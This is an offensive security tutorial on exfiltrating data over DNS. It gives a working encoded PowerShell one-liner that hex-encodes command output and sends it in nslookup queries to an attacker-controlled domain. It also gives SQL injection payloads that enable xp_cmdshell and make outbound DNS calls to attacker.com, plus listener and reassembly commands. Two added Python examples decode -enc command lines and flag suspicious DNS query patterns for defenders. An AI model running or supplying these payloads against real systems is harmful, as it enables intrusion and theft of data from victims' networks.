PowerShell — Data Ex-filtration over DNS (OOB)
Increasingly, companies consider security a top priority, and the exfiltration of data is more restricted.
OOB techniques are often useful for a blind vulnerability, where as an attacker you do not get the output of the exploit in the direct response, for instance in a web app vulnerable to blind injection. The attacker needs the target to generate an outbound TCP/UDP/ICMP request, which then allows data to be exfiltrated.
For this purpose, an attacker uses a built-in system tool that requires few privileges, with one-liner payloads, to achieve the objective.
The DNS protocol is an excellent channel. It is less monitored than other Internet protocols such as HTTP and FTP, because it is seen as posing a lesser risk. Thus, it has a higher chance of bypassing egress filtering.
Egress filtering is the practice of monitoring and potentially restricting the flow of information outbound from one network to another.
Challenges
- The DNS protocol restricts queries (i.e. outbound messages) to 255 bytes of letters, digits, and hyphens
- DNS is used mostly over the User Datagram Protocol (UDP), so there is no guarantee that queries will be replied to in the order they were sent
- The maximum length of a subdomain label is 63 characters
Overcoming previous challenges: generic process for DNS Ex-filtration
Payload in parts:
The payload created is shown below. It sends the output of ipconfig over DNS to dnspen.redacted.com.
cmd /v /c ipconfig > C:\Windows\Temp\output70 && certutil -encodehex -f C:\Windows\Temp\output70 C:\Windows\Temp\output70.hex 4 && powershell.exe -exec bypass -enc JAB0AGUAeAB0AD0ARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABvAHUAdABwAHUAdAA3ADAALgBoAGUAeAA7ACQAcwB1AGIAZABvAG0AYQBpAG4APQAkAHQAZQB4AHQALgByAGUAcABsAGEAYwBlACgAIgAgACIALAAiACIAKQA7ACQAagA9ADEAMQAxADEAMQA7AGYAbwByAGUAYQBjAGgAKAAkAGkAIABpAG4AIAAkAHMAdQBiAGQAbwBtAGEAaQBuACkAewAgACQAZgBpAG4AYQBsAD0AJABqAC4AdABvAHMAdAByAGkAbgBnACgAKQArACIALgAiACsAJABpACsAIgAuAGYAaQBsAGUALgB1AHMAZQByADcAMAAuAHcAZQBiAGgAYQBjAGsAbABhAGIALgBjAG8AbQAiADsAJABqACAAKwA9ACAAMQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBvAE4AZQB3AFcAaQBuAGQAbwB3ACAAbgBzAGwAbwBvAGsAdQBwACAAJABmAGkAbgBhAGwAIAB9AA==
[#] Let's understand the payload in parts:
First part:
cmd /v /c "ipconfig > C:\Windows\Temp\outab && certutil -encodehex -f C:\Windows\Temp\outab C:\Windows\Temp\outab.hex 4"
The command above writes the output to a file, then hex-encodes it with certutil in a specific format (columns of hex bytes separated by spaces, without the ASCII characters and the addresses), selected by format code 4.
The result is the hex value; you can decode it with https://gchq.github.io/CyberChef ("From Hex").
Second part: it runs a PowerShell script in Base64-encoded form to avoid breaking syntax when it is injected into the web app, due to escaping or breaking the SQL query. This script reads the hex-encoded output file, breaks the content into chunks and then generates DNS queries in a specific format, i.e.:
powershell.exe -exec bypass -enc {$encoded_script}
Plain script:
$text=Get-Content C:\Windows\Temp\output70.hex;$subdomain=$text.replace(" ","");$j=11111;foreach($i in $subdomain){ $final=$j.tostring()+"."+$i+".file.dnspen.redacted.com";$j += 1; Start-Process -NoNewWindow nslookup $final }
Note: this is not a normal Base64 encoder! It converts the string to UTF-16LE before encoding, as that is what PowerShell expects. To execute:
powershell.exe -exec bypass -enc {$encoded_script}
cmd:>cmd /v /c "ipconfig > C:\Users\IRHP\Desktop\output70 && certutil -encodehex -f C:\Users\IRHP\Desktop\output70 C:\Users\IRHP\Desktop\output70.hex 4 && powershell -exec bypass -enc {$encoded_script}"
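The UTF-16LE note above is the detail an analyst needs when a -enc command line turns up in process-creation logs. The following is an added Python example, not code from the original post: it locates the -enc/-EncodedCommand argument, Base64-decodes it, decodes the bytes as UTF-16LE rather than UTF-8, and pulls hostnames out of the recovered script so the DNS logs can be searched for them. The sample command line, the is_utf16le_text check and the three-label domain heuristic are constructed for this example.

```python
import base64
import re
from typing import List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# Longest alternatives first so "-encodedcommand" is not cut short at "-e".
_PREFIXES = "|".join("encodedcommand"[:i] for i in range(14, 0, -1))
ENC_SWITCH = re.compile(r"(?:^|\s)-(?:" + _PREFIXES + r")\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Heuristic for pivoting from the decoded script to DNS logs: hostnames with at
# least three labels. Hypothetical helper, not from the original post.
DOMAIN_RE = re.compile(r"(?:[a-z0-9-]+\.){2,}[a-z]{2,}", re.IGNORECASE)


def encode_for_powershell(script: str) -> str:
    """Build the -EncodedCommand argument the way PowerShell expects it:
    UTF-16LE text, then standard Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plain script carried by -enc/-EncodedCommand, or None if absent."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    raw = base64.b64decode(m.group(1), validate=True)
    # Decoding as UTF-8 would leave a NUL after every character; the
    # interleaved NUL bytes are the tell-tale of the UTF-16LE encoding.
    return raw.decode("utf-16-le")


def is_utf16le_text(raw: bytes) -> bool:
    """True when every odd byte is NUL, i.e. ASCII text encoded as UTF-16LE."""
    return len(raw) > 0 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2])


def referenced_domains(script: str) -> List[str]:
    """Hostnames mentioned in the decoded script (search terms for DNS logs)."""
    return sorted(set(m.group(0).lower() for m in DOMAIN_RE.finditer(script)))


# Constructed sample: a process-creation log line, not captured from a real host.
SAMPLE_CMDLINE = "powershell.exe -exec bypass -enc RwBlAHQALQBEAGEAdABlAA=="

if __name__ == "__main__":
    script = decode_encoded_command(SAMPLE_CMDLINE)
    print(script)  # Get-Date
    print(referenced_domains(script or ""))
```

Run it on the -enc blob from the full payload above and the plain script is recovered, with the parent domain that the nslookup queries are sent to listed by referenced_domains; a blob that decodes without interleaved NUL bytes was encoded from UTF-8 and will fail to run in PowerShell the way the note describes.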
Data Ex-filtration over DNS via SQLi
When exploiting a blind or second-order SQL injection, exploit it further to retrieve the data using an out-of-band (OOB) channel: DNS.
Start a DNS listener on your Kali machine.
In order to execute commands on the SQL Server via a web app vulnerable to SQL injection, you need to ensure xp_cmdshell is enabled in the backend.
Below is a second-order SQL injection, with the value supplied in the update-profile form:
';exec sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; --
';exec master..xp_cmdshell 'cmd.exe /c nslookup tester.dnspenX.attacker.com'; --
Exploitation:
Start the DNS listener to save the output to a file while exfiltrating.
As there is a limit on the size and type of data that can be sent over DNS, we need to use the payload created above, which encodes the output, breaks it into chunks and then sends it over the DNS channel with sequence numbers attached to them.
Once the OOB calls are received, the output can be sorted with the help of the sequence numbers, as UDP packets have no guaranteed arrival order.
root@Kali:~# tcpdump -n udp port 53 -i any | tee oob.txt
Extract the plain-text data from the file:
root@Kali:~# egrep -o '[0-9]{5}\.[0-9a-fA-F]{1,62}' oob.txt | sort -u | cut -d. -f2 | xxd -r -p
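The reassembly and ordering step, as an added Python example rather than the post's own egrep pipeline: it parses tcpdump-style query lines (constructed here, not a real capture), collects the 5-digit sequence label and the hex label per parent domain, drops duplicate observations, orders chunks numerically, reports gaps left by lost datagrams, and decodes the hex. It goes one step beyond the post by turning the same parse into a detection rule: any parent domain that receives many sequence-numbered hex labels is flagged. The log format, the sample domain and the threshold are assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List

# One tcpdump "A?" query line: <5-digit sequence>.<hex chunk>.<parent domain>.
# The parent group stops before the trailing dot tcpdump prints after the name.
QUERY_RE = re.compile(
    r"A\? (\d{5})\.([0-9a-fA-F]{1,62})\.([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*)\.? \("
)

# Constructed sample in tcpdump's text format (not a real capture): one benign
# query, chunks arriving out of order, and chunk 11111 seen twice (as "-i any"
# does when the same datagram appears on two interfaces).
SAMPLE_LOG = """\
12:00:01.000100 IP 10.0.0.5.51234 > 10.0.0.53.53: 4321+ A? www.example.com. (33)
12:00:01.000200 IP 10.0.0.5.51235 > 10.0.0.53.53: 4322+ A? 11112.6775726174696f6e.file.dnspen.redacted.com. (66)
12:00:01.000300 IP 10.0.0.5.51236 > 10.0.0.53.53: 4323+ A? 11111.57696e646f777320495020436f6e6669.file.dnspen.redacted.com. (82)
12:00:01.000300 IP 10.0.0.5.51236 > 10.0.0.53.53: 4323+ A? 11111.57696e646f777320495020436f6e6669.file.dnspen.redacted.com. (82)
"""


def parse_chunks(log_text: str) -> Dict[str, Dict[int, str]]:
    """Map parent domain -> {sequence number: hex chunk}. Re-assigning the same
    sequence number de-duplicates repeated observations of one query."""
    chunks: Dict[str, Dict[int, str]] = defaultdict(dict)
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        seq, hexdata, parent = m.groups()
        if len(hexdata) % 2:
            continue  # certutil emits whole bytes; an odd-length label is damaged
        chunks[parent.lower()][int(seq)] = hexdata.lower()
    return dict(chunks)


def missing_sequences(chunk_map: Dict[int, str]) -> List[int]:
    """Sequence numbers absent between the lowest and highest seen (lost datagrams)."""
    if not chunk_map:
        return []
    lo, hi = min(chunk_map), max(chunk_map)
    return [s for s in range(lo, hi + 1) if s not in chunk_map]


def reassemble(chunk_map: Dict[int, str]) -> bytes:
    """Order chunks numerically (not lexically) and decode the hex."""
    return bytes.fromhex("".join(chunk_map[s] for s in sorted(chunk_map)))


def suspicious_parents(chunks: Dict[str, Dict[int, str]], min_chunks: int = 10) -> List[str]:
    """Detection rule: parent domains that received at least min_chunks distinct
    sequence-numbered hex labels. The default threshold is an assumption."""
    return sorted(p for p, m in chunks.items() if len(m) >= min_chunks)


if __name__ == "__main__":
    found = parse_chunks(SAMPLE_LOG)
    for parent, chunk_map in found.items():
        print(parent, reassemble(chunk_map), "missing:", missing_sequences(chunk_map))
    print("flagged:", suspicious_parents(found, min_chunks=2))
```

The post's sort -u orders the captured lines lexically, which gives the right result only because the counter starts at 11111 and stays five digits wide; sorting on the integer value keeps working past 99999. The gap report matters on a lossy link: a missing sequence number means the decoded bytes are shifted from that point on, which the plain egrep pipeline would not reveal.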
References:
https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1
https://github.com/Arno0x/DNSExfiltrator
https://pentest.blog/data-ex-filtration-with-dns-in-sqli-attacks/
https://isc.sans.edu/forums/diary/Exfiltrating+data+from+very+isolated+environments/23645/
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
https://adsecurity.org/?p=478
https://raikia.com/tool-powershell-encoder/